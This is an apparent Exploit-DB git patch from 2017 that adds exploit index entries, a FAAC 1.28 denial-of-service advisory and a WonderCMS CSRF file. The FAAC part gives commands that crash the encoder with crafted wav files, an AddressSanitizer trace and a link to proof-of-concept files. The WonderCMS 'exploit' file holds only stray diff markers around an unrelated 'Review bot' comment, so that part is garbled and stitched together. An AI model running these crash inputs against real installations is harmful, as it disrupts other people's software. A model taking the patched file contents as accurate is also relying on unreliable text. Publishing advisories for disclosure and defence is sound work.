From b00ce2562cfe4a20f7bfab2f44ed417de44fbac9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 21 Jun 2017 05:01:28 +0000
Subject: [PATCH] DB: 2017-06-21
2 new exploits
Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service
Sudo - 'get_process_ttyname()' Privilege Escalation
Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation
WonderCMS 2.1.0 - Cross-Site Request Forgery
---
 files.csv | 4 +-
 platforms/linux/dos/42207.txt | 52 +++++++++++++++++++++++++
 platforms/php/webapps/42205.html | 60 +++++++++++++++++++++++++++++
 platforms/windows/webapps/42091.txt | 1 -
 4 files changed, 115 insertions(+), 2 deletions(-)
 create mode 100755 platforms/linux/dos/42207.txt
 create mode 100755 platforms/php/webapps/42205.html
diff --git a/files.csv b/files.csv
index 9b566c5eb..01a037fc8 100644
--- a/files.csv
+++ b/files.csv
@@ -5555,6 +5555,7 @@ id,file,description,date,author,platform,type,port
 42202,platforms/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42203,platforms/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
 42204,platforms/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
+42207,platforms/linux/dos/42207.txt,"Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service",2017-06-20,qflb.wu,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9066,7 +9067,7 @@ id,file,description,date,author,platform,type,port
 42163,platforms/windows/local/42163.py,"Disk Pulse 9.7.26 - 'Add Directory' Local Buffer Overflow",2017-06-12,abatchy17,windows,local,0
 42174,platforms/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)",2017-06-13,abatchy17,windows,local,0
 42181,platforms/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,windows,local,0
-42183,platforms/linux/local/42183.c,"Sudo - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
+42183,platforms/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation",2017-06-14,"Qualys Corporation",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -38029,3 +38030,4 @@ id,file,description,date,author,platform,type,port
 42195,platforms/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
 42196,platforms/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0
 42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0
+42205,platforms/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps,0
diff --git a/platforms/linux/dos/42207.txt b/platforms/linux/dos/42207.txt
new file mode 100755
index 000000000..bd0746ed1
--- /dev/null
+++ b/platforms/linux/dos/42207.txt
@@ -0,0 +1,52 @@
+Freeware Advanced Audio Coder (FAAC) multiple vulnerabilities
+
+================
+Author : qflb.wu
+===============
+
+Introduction:
+=============
+FAAC is an encoder for a lossy sound compression scheme specified in MPEG-2 Part 7 and MPEG-4 Part 3 standards and known as Advanced Audio Coding (AAC). This encoder is useful for producing files that can be played back on iPod. Moreover, iPod does not understand other sound compression schemes in video files.
+
+Affected version:
+=====
+1.28
+
+Vulnerability Description:
+==========================
+1.
+the wav_open_read function in frontend/input.c in Freeware Advanced Audio Coder (FAAC) 1.28 can cause a denial of service(large loop) via a crafted wav file.
+
+./faac faac_1.28_wav_open_read_large_loop.wav -o out.aac
+
+POC:
+faac_1.28_wav_open_read_large_loop.wav
+CVE:
+CVE-2017-9129
+
+2.
+the faacEncOpen function in libfaac/frame.c in Freeware Advanced Audio Coder (FAAC) 1.28 can cause a denial of service(invalid memory read and application crash) via a crafted wav file.
+
+./faac faac_1.28_faacEncOpen_invalid_memory.wav -o out.aac
+
+ASAN:SIGSEGV
+=================================================================
+==49677==ERROR: AddressSanitizer: SEGV on unknown address 0x7f3e959c9b34 (pc 0x7f3e96bf7739 sp 0x7ffe47c93980 bp 0x000000a59e50 T0)
+ #0 0x7f3e96bf7738 in faacEncOpen /home/a/Downloads/faac-1.28/libfaac/frame.c:368
+ #1 0x49c444 in main /home/a/Downloads/faac-1.28/frontend/main.c:803
+ #2 0x7f3e959d3ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
+ #3 0x49311c in _start (/home/a/Downloads/faac-1.28/frontend/.libs/lt-faac+0x49311c)
+
+AddressSanitizer can not provide additional info.
+SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/faac-1.28/libfaac/frame.c:368 faacEncOpen
+==49677==ABORTING
+
+POC:
+faac_1.28_faacEncOpen_invalid_memory.wav
+CVE:
+CVE-2017-9130
+
+===============================
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42207.zip
diff --git a/platforms/php/webapps/42205.html b/platforms/php/webapps/42205.html
new file mode 100755
index 000000000..eef414efb
--- /dev/null
+++ b/platforms/php/webapps/42205.html
@@ -0,0 +1,60 @@
+ + + +
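Review bot: The "Affected version" section names only 1.28 and the advisory gives no fixed version, upstream commit or patch reference for either CVE-2017-9129 or CVE-2017-9130, so a reader cannot tell whether later FAAC builds are remediated or what to compare against; a line such as `Fixed in: <version or upstream commit — to be confirmed>` directly after `1.28` would close that gap. The impact is already bounded by the text itself — a large loop in wav_open_read and an invalid memory read in faacEncOpen at frame.c:368, both reached only when a crafted wav file is fed to the encoder — and stating that boundary once in the summary would keep the entry from being read as anything beyond denial of service. The sample inputs are named in the POC: lines but only reachable through the external zip link, so a short note that the trace above was produced with `faac_1.28_faacEncOpen_invalid_memory.wav` would let a reader match the trace to the sample without downloading it.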
+ + + + +
+ + + +
diff --git a/platforms/windows/webapps/42091.txt b/platforms/windows/webapps/42091.txt
index d69b71834..86d1f4128 100755
--- a/platforms/windows/webapps/42091.txt
+++ b/platforms/windows/webapps/42091.txt
@@ -19,7 +19,6 @@ An independent security researcher has reported this vulnerability to Beyond Sec
 Vendor response
 IBM has released patches to address those vulnerabilities and issued the following CVE’s:
-CVE-2016-2183
 CVE-2017-1092
 For more Information – http://www-01.ibm.com/support/docview.wss?uid=swg22002897